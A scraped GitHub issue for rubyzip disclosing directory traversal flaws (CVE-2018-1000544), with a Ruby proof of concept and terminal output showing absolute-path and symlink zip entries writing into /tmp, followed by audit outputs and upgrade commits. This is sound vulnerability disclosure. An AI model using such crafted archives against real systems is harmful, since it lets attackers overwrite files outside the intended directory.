Several directory traversal vulnerabilities #369

tuzovakaoff · 2018-06-14T18:41:06Z

Overview

This issue is similar to already closed #315 but I found two ways to bypass that fix.

You can find files for tests in https://github.com/tuzovakaoff/zip_path_traversal

Proof of concept:

rubyzip.rb

require 'zip'
first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end

1. Files with absolute path

UnZip strips absolute path

> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> unzip absolutepath.zip
Archive:  absolutepath.zip
warning:  stripped absolute path spec from /tmp/
   creating: tmp/
warning:  stripped absolute path spec from /tmp/file.txt
  inflating: tmp/file.txt

> ls
absolutepath.zip	symlink.zip
rubyzip.rb		tmp

rubyzip extracts files with absolute path

> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> ruby rubyzip.rb absolutepath.zip
Extracting /tmp/
Extracting /tmp/file.txt

> ls
absolutepath.zip        rubyzip.rb              symlink.zip

> ls /tmp
file.txt

2. Archive with symbolic link

UnZip extracts only symbolic link

> unzip symlink.zip
Archive:  symlink.zip
    linking: path                    -> ../../../../../tmp
checkdir error:  path exists but is not directory
                 unable to process path/file.txt.
finishing deferred symbolic links:
  path                   -> ../../../../../tmp


> ls -l path
lrwxr-xr-x  1 user  group  18 Jun 14 21:19 path -> ../../../../../tmp

rubyzip extracts symbolic link and puts file into `/tmp` folder

> ruby rubyzip.rb symlink.zip 
Extracting path
Extracting path/file.txt

> ls -l path
lrwxr-xr-x  1 user  group  18 Jun 14 21:22 path -> ../../../../../tmp

>ls /tmp
file.txt

Vulnerable version and test environment

> uname -rsv
Darwin 17.6.0 Darwin Kernel Version 17.6.0: Tue May  8 15:22:16 PDT 2018; root:xnu-4570.61.1~1/RELEASE_X86_64

> ruby -v
ruby 2.5.0p0 (2017-12-25 revision 61468) [x86_64-darwin17]

> gem list | grep zip
rubyzip (1.2.1)

> uname -rsv
Linux 2.6.32-573.18.1.el6.x86_64 #1 SMP Tue Feb 9 22:46:17 UTC 2016

> ruby -v
ruby 2.4.1p111 (2017-03-22 revision 58053) [x86_64-linux]

> gem list | grep zip
rubyzip (1.2.1)

The text was updated successfully, but these errors were encountered:

abergmann · 2018-06-27T09:39:12Z

CVE-2018-1000544 was assigned to this issue.

…ubyzip/rubyzip#369) which only affects test env (selenium-webdriver dependency) until it's resolved (rubyzip/rubyzip#376).

mrtc0 · 2018-09-03T06:34:31Z

Hi,

I think that this fix is inadequate.
The following code can still Pass Traversal and extract to /tmp/ .

$ zipinfo absolutepath.zip
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-14 05:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-14 05:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%

require 'zip'

Zip::File.open("./absolutepath.zip") do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    # entry.extract(File.join(test_path, entry.name))
    entry.extract(entry.name)
  end
end

I think that If not specify the destination directory, it should be expanded to the current directory.
What do you think about this?

rubyzip 1.2.2 includes the fix for CVE-2018-1000544: rubyzip/rubyzip#369

* Update rubyzip dependency rubyzip 1.2.2 includes the fix for CVE-2018-1000544: rubyzip/rubyzip#369 * Update Gemfile.lock to be consistent with the gemspec

I am not sure that `bundle audit` said about `rubyzip', but `github` alerted about 'ffi'. So that I did `bundle update ffi --conservative`. ``` Name: rubyzip Version: 1.2.1 Advisory: CVE-2018-1000544 Criticality: Unknown URL: rubyzip/rubyzip#369 Title: Directory Traversal in rubyzip Solution: remove or disable this gem until a patch is available! Vulnerabilities found! ```

The rubyzip gem version 1.2.1 contains a security vulnerability allowing absolute path traversal. More details can be found here: rubyzip/rubyzip#369 This change addresses the issue by specifying a rubyzip version greater than or equal to 1.2.2. Solves issue randym#599

ruby-advisory-db: 323 advisories Name: nokogiri Version: 1.8.4 Advisory: CVE-2018-14404 Criticality: Unknown URL: sparklemotion/nokogiri#1785 Title: Nokogiri gem, via libxml2, is affected by multiple vulnerabilities Solution: upgrade to >= 1.8.5 Name: rubyzip Version: 1.2.1 Advisory: CVE-2018-1000544 Criticality: Unknown URL: rubyzip/rubyzip#369 Title: Directory Traversal in rubyzip Solution: upgrade to >= 1.2.2

From bundle-audit: Name: ffi Version: 1.9.18 Advisory: CVE-2018-1000201 Criticality: High URL: https://github.com/ffi/ffi/releases/tag/1.9.24 Title: ruby-ffi DDL loading issue on Windows OS Solution: upgrade to >= 1.9.24 Name: rubyzip Version: 1.2.1 Advisory: CVE-2018-1000544 Criticality: Unknown URL: rubyzip/rubyzip#369 Title: Directory Traversal in rubyzip Solution: upgrade to >= 1.2.2 Upgrade: | ffi | 1.9.18 -> 1.9.25 | rubyzip | 1.2.1 -> 1.2.2 Bug: T209940 Change-Id: I3da41a964ff1128a4cbba3c05976cfcfca2d731f

Address a couple of CVEs (as reported by `bundler-audit`). Name: ffi Version: 1.9.23 Advisory: CVE-2018-1000201 Criticality: High URL: https://github.com/ffi/ffi/releases/tag/1.9.24 Title: ruby-ffi DDL loading issue on Windows OS Solution: upgrade to >= 1.9.24 Name: nokogiri Version: 1.8.2 Advisory: CVE-2018-8048 Criticality: Unknown URL: sparklemotion/nokogiri#1746 Title: Revert libxml2 behavior in Nokogiri gem that could cause XSS Solution: upgrade to >= 1.8.3 Name: nokogiri Version: 1.8.2 Advisory: CVE-2018-14404 Criticality: Unknown URL: sparklemotion/nokogiri#1785 Title: Nokogiri gem, via libxml2, is affected by multiple vulnerabilities Solution: upgrade to >= 1.8.5 Name: rubyzip Version: 1.2.1 Advisory: CVE-2018-1000544 Criticality: Unknown URL: rubyzip/rubyzip#369 Title: Directory Traversal in rubyzip Solution: upgrade to >= 1.2.2

bdewater mentioned this issue Jul 1, 2018

Fix CVE-2018-1000544 #371

Merged

jdleesmiller mentioned this issue Aug 26, 2018

Fix CVE-2018-1000544 and disable symlinks to avoid other security issues #376

Merged

rmoriz mentioned this issue Aug 26, 2018

update gems, update celluloid to latest ref chef/supermarket#1755

Closed

Bodacious mentioned this issue Aug 27, 2018

Refactor how section ordering is handled DMPRoadmap/roadmap#1837

Merged

zammad-sync pushed a commit to zammad/zammad that referenced this issue Aug 27, 2018

Added dependency vulerability check exclusion for CVE-2018-1000544 (r…

f0690f8

…ubyzip/rubyzip#369) which only affects test env (selenium-webdriver dependency) until it's resolved (rubyzip/rubyzip#376).

zammad-sync pushed a commit to zammad/zammad that referenced this issue Aug 27, 2018

Added dependency vulerability check exclusion for CVE-2018-1000544 (r…

0f9073a

…ubyzip/rubyzip#369) which only affects test env (selenium-webdriver dependency) until it's resolved (rubyzip/rubyzip#376).

nratter mentioned this issue Aug 27, 2018

Vulnerability with Rubyzip 1.2.1 caxlsx/caxlsx_rails#104

Closed

Bodacious mentioned this issue Aug 27, 2018

Issue 532 DMPRoadmap/roadmap#1847

Merged

mkdynamic added a commit to delighted/rubyzip that referenced this issue Aug 28, 2018

temporary fix for rubyzip#369

5dc4fd0

mkdynamic added a commit to delighted/roo that referenced this issue Aug 28, 2018

temporary fix for rubyzip/rubyzip#369

e6515f3

waterjump mentioned this issue Aug 28, 2018

rubyzip 1.2.1 dependency is shown to have security vulnerabilities. randym/axlsx#599

Open

scott mentioned this issue Aug 29, 2018

rubyzip vulnerabilities helpyio/helpy#883

Closed

simonoff closed this as completed in #371 Aug 31, 2018

walro added a commit to walro/extensionator that referenced this issue Sep 3, 2018

Update rubyzip dependency

8038461

rubyzip 1.2.2 includes the fix for CVE-2018-1000544: rubyzip/rubyzip#369

walro mentioned this issue Sep 3, 2018

Update rubyzip dependency Zensight/extensionator#8

Merged

tdg5 pushed a commit to Zensight/extensionator that referenced this issue Sep 4, 2018

Update rubyzip dependency (#8)

b129422

* Update rubyzip dependency rubyzip 1.2.2 includes the fix for CVE-2018-1000544: rubyzip/rubyzip#369 * Update Gemfile.lock to be consistent with the gemspec

waterjump mentioned this issue Sep 7, 2018

Address security vulnerability in rubyzip dependency randym/axlsx#602

Open

somethingnew2-0 mentioned this issue Sep 11, 2018

Fix gem versions in rubyzip advisory rubysec/ruby-advisory-db#353

Merged

AdrianCann mentioned this issue Oct 14, 2018

Update gems with security vulnerabilities sophomoric/secret#91

Merged

rimenes mentioned this issue Oct 23, 2018

Gem security updates. DroptuneHQ/droptune-og#70

Merged

johnsyweb mentioned this issue Dec 20, 2018

Automated Bundle Update johnsyweb/johnsyweb.github.io#8

Merged

jdleesmiller mentioned this issue Mar 22, 2019

Bump version to 1.2.3 #393

Merged

kindjar added a commit to delighted/rubyzip that referenced this issue Oct 9, 2019

Remove temp mitigation for rubyzip#369; fixed upstream

c6bd394

baburdick mentioned this issue Nov 11, 2021

Upgrade Rubyzip 2 randym/axlsx#646

Open

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Several directory traversal vulnerabilities #369

Several directory traversal vulnerabilities #369

Uh oh!

Uh oh!

Several directory traversal vulnerabilities #369

Several directory traversal vulnerabilities #369

Comments

Overview

Proof of concept:

rubyzip.rb

1. Files with absolute path

UnZip strips absolute path

rubyzip extracts files with absolute path

2. Archive with symbolic link

UnZip extracts only symbolic link

rubyzip extracts symbolic link and puts file into /tmp folder

Vulnerable version and test environment

Uh oh!

Uh oh!

Uh oh!

rubyzip extracts symbolic link and puts file into `/tmp` folder